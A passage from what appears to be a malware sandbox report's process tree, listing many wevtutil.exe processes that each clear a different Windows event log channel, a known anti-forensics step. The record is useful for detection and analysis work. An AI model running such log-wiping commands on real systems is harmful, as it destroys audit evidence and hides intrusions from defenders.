    wevtutil.exe cl "Microsoft-Windows-Deduplication/Scrubbing"
    3⤵
    PID:4904
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Defrag-Core/Debug"
    3⤵
    PID:4920
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Deplorch/Analytic"
    3⤵
    PID:4940
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DesktopActivityModerator/Diagnostic"
    3⤵
    PID:4952
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DesktopWindowManager-Diag/Diagnostic"
    3⤵
    PID:4972
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DeviceAssociationService/Performance"
    3⤵
    PID:4984
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DeviceConfidence/Analytic"
    3⤵
    PID:5004
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DeviceGuard/Operational"
    3⤵
    PID:5020
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider/Admin"
    3⤵
    PID:5036
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider/Debug"
    3⤵
    PID:5048
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DeviceSetupManager/Admin"
    3⤵
    PID:204
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DeviceSetupManager/Analytic"
    3⤵
    PID:3492
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DeviceSetupManager/Debug"
    3⤵
    PID:5064
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DeviceSetupManager/Operational"
    3⤵
    PID:5084
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DeviceSync/Analytic"
    3⤵
    PID:5096
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DeviceSync/Operational"
    3⤵
    PID:5112
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DeviceUx/Informational"
    3⤵
    PID:4100
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DeviceUx/Performance"
    3⤵
    PID:4108
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Devices-Background/Operational"
    3⤵
    PID:4124
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Dhcp-Client/Admin"
    3⤵
    PID:4196
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Dhcp-Client/Operational"
    3⤵
    PID:4252
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Dhcpv6-Client/Admin"
    3⤵
    PID:4228
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Dhcpv6-Client/Operational"
    3⤵
    PID:4276
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DiagCpl/Debug"
    3⤵
    PID:4320
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-AdvancedTaskManager/Analytic"
    3⤵
    PID:4352
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Analytic"
    3⤵
    PID:4376
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Debug"
    3⤵
    PID:4392
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Operational"
    3⤵
    PID:4412
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-MSDE/Debug"
    3⤵
    PID:4416
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Analytic"
    3⤵
    PID:4456
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Debug"
    3⤵
    PID:4468
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Operational"
    3⤵
    PID:4488
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-PLA/Debug"
    3⤵
    PID:4508
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-PLA/Operational"
    3⤵
    PID:4512
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-Perfhost/Analytic"
    3⤵
    PID:4524
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scheduled/Operational"
    3⤵
    PID:4572
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Admin"
    3⤵
    PID:4560
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Analytic"
    3⤵
    PID:4580
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Debug"
    3⤵
    PID:4596
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Operational"
    3⤵
    PID:4636
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-ScriptedDiagnosticsProvider/Debug"
    3⤵
    PID:4652
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-ScriptedDiagnosticsProvider/Operational"
    3⤵
    PID:4660
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-WDC/Analytic"
    3⤵
    PID:4672
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-WDI/Debug"
    3⤵
    PID:4668
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnostics-Networking/Debug"
    3⤵
    PID:4720
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnostics-Networking/Operational"
    3⤵
    PID:4732
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnostics-PerfTrack-Counters/Diagnostic"
    3⤵
    PID:4728
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnostics-PerfTrack/Diagnostic"
    3⤵
    PID:4752
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnostics-Performance/Diagnostic"
    3⤵
    PID:4788
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnostics-Performance/Diagnostic/Loopback"
    3⤵
    PID:4812
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnostics-Performance/Operational"
    3⤵
    PID:4828
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Direct3D10/Analytic"
    3⤵
    PID:4844
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Direct3D10_1/Analytic"
    3⤵
    PID:4852
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Direct3D11/Analytic"
    3⤵
    PID:4876
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Direct3D11/Logging"
    3⤵
    PID:4764
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Direct3D11/PerfTiming"
    3⤵
    PID:4760
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Direct3D12/Analytic"
    3⤵
    PID:4892
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Direct3D12/Logging"
    3⤵
    PID:2440
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Direct3D12/PerfTiming"
    3⤵
    PID:2288
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Direct3D9/Analytic"
    3⤵
    PID:4904
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Direct3DShaderCache/Default"
    3⤵
    PID:4920
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DirectComposition/Diagnostic"
    3⤵
    PID:4940
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DirectManipulation/Diagnostic"
    3⤵
    PID:4952
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DirectShow-KernelSupport/Performance"
    3⤵
    PID:4972
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DirectSound/Debug"
    3⤵
    PID:4984
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DirectWrite-FontCache/Tracing"
    3⤵
    PID:5004
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DirectWrite/Tracing"
    3⤵
    PID:5020
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Disk/Operational"
    3⤵
    PID:5036
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DiskDiagnostic/Operational"
    3⤵
    PID:5048
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DiskDiagnosticDataCollector/Operational"
    3⤵
    PID:204
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DiskDiagnosticResolver/Operational"
    3⤵
    PID:4164
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Dism-Api/Analytic"
    3⤵
    PID:4172
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Dism-Api/ExternalAnalytic"
    3⤵
    PID:1096
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Dism-Api/InternalAnalytic"
    3⤵
    PID:5060
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Dism-Cli/Analytic"
    3⤵
    PID:5076
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DisplayColorCalibration/Debug"
    3⤵
    PID:4104
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DisplayColorCalibration/Operational"
    3⤵
    PID:4120
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DisplaySwitch/Diagnostic"
    3⤵
    PID:1004
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Documents/Performance"
    3⤵
    PID:4116
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Dot3MM/Diagnostic"
    3⤵
    PID:4208
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DriverFrameworks-UserMode/Operational"
    3⤵
    PID:4204
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Dwm-API/Diagnostic"
    3⤵
    PID:4284
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Dwm-Core/Diagnostic"
    3⤵
    PID:4260
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Dwm-Dwm/Diagnostic"
    3⤵
    PID:4312
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Dwm-Redir/Diagnostic"
    3⤵
    PID:4344
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Dwm-Udwm/Diagnostic"
    3⤵
    PID:4368
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DxgKrnl/Contention"
    3⤵
    PID:4384
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DxgKrnl/Diagnostic"
    3⤵
    PID:4404
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DxgKrnl/Performance"
    3⤵
    PID:4392
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DxgKrnl/Power"
    3⤵
    PID:4412
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DxpTaskSyncProvider/Analytic"
    3⤵
    PID:4416
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-EDP-Application-Learning/Admin"
    3⤵
    PID:4456
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-EDP-Audit-Regular/Admin"
    3⤵
    PID:4468
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-EDP-Audit-TCB/Admin"
    3⤵
    PID:4488
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-EFS/Debug"
    3⤵
    PID:4508
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ESE/IODiagnose"
    3⤵
    PID:4512
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ESE/Operational"
    3⤵
    PID:4592
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-EapHost/Analytic"
    3⤵
    PID:4600
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-EapHost/Debug"
    3⤵
    PID:4620
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-EapHost/Operational"
    3⤵
    PID:4632
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-EapMethods-RasChap/Operational"
    3⤵
    PID:4644
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-EapMethods-RasTls/Operational"
    3⤵
    PID:4640
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-EapMethods-Sim/Operational"
    3⤵
    PID:4680
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-EapMethods-Ttls/Operational"
    3⤵
    PID:4688
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-EaseOfAccess/Diagnostic"
    3⤵
    PID:4692
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-EmbeddedAppLauncher/Admin"
    3⤵
    PID:4704
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-EmbeddedAppLauncher/Operational"
    3⤵
    PID:4724
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Energy-Estimation-Engine/EventLog"
    3⤵
    PID:4800
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Energy-Estimation-Engine/Trace"
    3⤵
    PID:4816
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-EnhancedStorage-EhStorTcgDrv/Analytic"
    3⤵
    PID:4832
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-EventCollector/Debug"
    3⤵
    PID:4848
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-EventCollector/Operational"
    3⤵
    PID:4864
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-EventLog-WMIProvider/Debug"
    3⤵
    PID:4860
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-EventLog/Analytic"
    3⤵
    PID:4872
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-EventLog/Debug"
    3⤵
    PID:4772
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-FMS/Analytic"
    3⤵
    PID:4768
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-FMS/Debug"
    3⤵
    PID:4888
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-FMS/Operational"
    3⤵
    PID:2316
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-FailoverClustering-Client/Diagnostic"
    3⤵
    PID:1308
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Fault-Tolerant-Heap/Operational"
    3⤵
    PID:4132
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-FileHistory-Catalog/Analytic"
    3⤵
    PID:2288
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-FileHistory-Catalog/Debug"
    3⤵
    PID:4904
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-FileHistory-ConfigManager/Analytic"
    3⤵
    PID:4956
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-FileHistory-ConfigManager/Debug"
    3⤵
    PID:4940
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-FileHistory-Core/Analytic"
    3⤵
    PID:4988
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-FileHistory-Core/Debug"
    3⤵
    PID:5000
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-FileHistory-Core/WHC"
    3⤵
    PID:5016
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-FileHistory-Engine/Analytic"
    3⤵
    PID:5032
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-FileHistory-Engine/BackupLog"
    3⤵
    PID:5052
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-FileHistory-Engine/Debug"
    3⤵
    PID:1160
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-FileHistory-EventListener/Analytic"
    3⤵
    PID:4176
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-FileHistory-EventListener/Debug"
    3⤵
    PID:4200
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-FileHistory-Service/Analytic"
    3⤵
    PID:3292
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-FileHistory-Service/Debug"
    3⤵
    PID:5088
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-FileHistory-UI-Events/Analytic"
    3⤵
    PID:5104
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-FileHistory-UI-Events/Debug"
    3⤵
    PID:5116
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-FileInfoMinifilter/Operational"
    3⤵
    PID:1588
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Firewall-CPL/Diagnostic"
    3⤵
    PID:4104
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Folder Redirection/Operational"
    3⤵
    PID:4120
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-FontGroups/Diagnostic"
    3⤵
    PID:1004
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Forwarding/Debug"
    3⤵
    PID:4124
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Forwarding/Operational"
    3⤵
    PID:4208
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-GPIO-ClassExtension/Analytic"
    3⤵
    PID:4204
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-GenericRoaming/Admin"
    3⤵
    PID:4284
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-GroupPolicy/Operational"
    3⤵
    PID:4276
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-HAL/Debug"
    3⤵
    PID:4320
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-HealthCenter/Debug"
    3⤵
    PID:4352
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-HealthCenter/Performance"
    3⤵
    PID:4376
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-HealthCenterCPL/Performance"
    3⤵
    PID:4388
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-HelloForBusiness/Operational"
    3⤵
    PID:4436
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Help/Operational"
    3⤵
    PID:4444
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-HomeGroup Control Panel Performance/Diagnostic"
    3⤵
    PID:4428
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-HomeGroup Control Panel/Operational"
    3⤵
    PID:4472
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-HomeGroup Listener Service/Operational"
    3⤵
    PID:4484
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-HomeGroup Provider Service Performance/Diagnostic"
    3⤵
    PID:4500
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-HomeGroup Provider Service/Operational"
    3⤵
    PID:4520
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-HomeGroup-ListenerService"
    3⤵
    PID:4524
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-HotspotAuth/Analytic"
    3⤵
    PID:4512
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-HotspotAuth/Operational"
    3⤵
    PID:4592
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-HttpService/Log"
    3⤵
    PID:4600
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-HttpService/Trace"
    3⤵
    PID:4620
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Hyper-V-Guest-Drivers/Admin"
    3⤵
    PID:4632
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Hyper-V-Guest-Drivers/Analytic"
    3⤵
    PID:4644
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Hyper-V-Guest-Drivers/Debug"
    3⤵
    PID:4640
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Hyper-V-Guest-Drivers/Diagnose"
    3⤵
    PID:4672
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Hyper-V-Guest-Drivers/Operational"
    3⤵
    PID:4668
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Hyper-V-NETVSC/Diagnostic"
    3⤵
    PID:4720
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-IKE/Operational"
    3⤵
    PID:4732
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-IKEDBG/Debug"
    3⤵
    PID:4728
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-IME-Broker/Analytic"
    3⤵
    PID:4752
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-IME-CandidateUI/Analytic"
    3⤵
    PID:4788
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-IME-CustomerFeedbackManager/Debug"
    3⤵
    PID:4812
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-IME-CustomerFeedbackManagerUI/Analytic"
    3⤵
    PID:4828
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-IME-JPAPI/Analytic"
    3⤵
    PID:4844
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-IME-JPLMP/Analytic"
    3⤵
    PID:4852
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-IME-JPPRED/Analytic"
    3⤵
    PID:4876
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-IME-JPSetting/Analytic"
    3⤵
    PID:4764
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-IME-JPTIP/Analytic"
    3⤵
    PID:4760
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-IME-KRAPI/Analytic"
    3⤵
    PID:4892
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-IME-KRTIP/Analytic"
    3⤵
    PID:2440
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-IME-OEDCompiler/Analytic"
    3⤵
    PID:4928
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-IME-TCCORE/Analytic"
    3⤵
    PID:4944
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-IME-TCTIP/Analytic"
    3⤵
    PID:4932
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-IME-TIP/Analytic"
    3⤵
    PID:4976
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-IPNAT/Diagnostic"
    3⤵
    PID:4992
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-IPSEC-SRV/Diagnostic"
    3⤵
    PID:4972
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-IdCtrls/Analytic"
    3⤵
    PID:4984
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-IdCtrls/Operational"
    3⤵
    PID:900
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-IndirectDisplays-ClassExtension-Events/Diagnostic"
    3⤵
    PID:5016
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Input-HIDCLASS-Analytic"
    3⤵
    PID:5032
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-InputSwitch/Diagnostic"
    3⤵
    PID:5052
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-International-RegionalOptionsControlPanel/Operational"
    3⤵
    PID:1160
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-International/Operational"
    3⤵
    PID:4176
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Iphlpsvc/Debug"
    3⤵
    PID:4200
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Iphlpsvc/Operational"
    3⤵
    PID:3292
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Iphlpsvc/Trace"
    3⤵
    PID:5088
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-KdsSvc/Operational"
    3⤵
    PID:5104
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kerberos/Operational"
    3⤵
    PID:5116
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-Acpi/Diagnostic"
    3⤵
    PID:1588
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-AppCompat/General"
    3⤵
    PID:4104
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-AppCompat/Performance"
    3⤵
    PID:4120
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-ApphelpCache/Analytic"
    3⤵
    PID:1004
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-ApphelpCache/Debug"
    3⤵
    PID:4124
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-ApphelpCache/Operational"
    3⤵
    PID:4208
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-Boot/Analytic"
    3⤵
    PID:4204
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-Boot/Operational"
    3⤵
    PID:4284
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-BootDiagnostics/Diagnostic"
    3⤵
    PID:4276
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-Disk/Analytic"
    3⤵
    PID:4320
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-EventTracing/Admin"
    3⤵
    PID:4352
- - C:\Windows\system32\wevtutil.exe
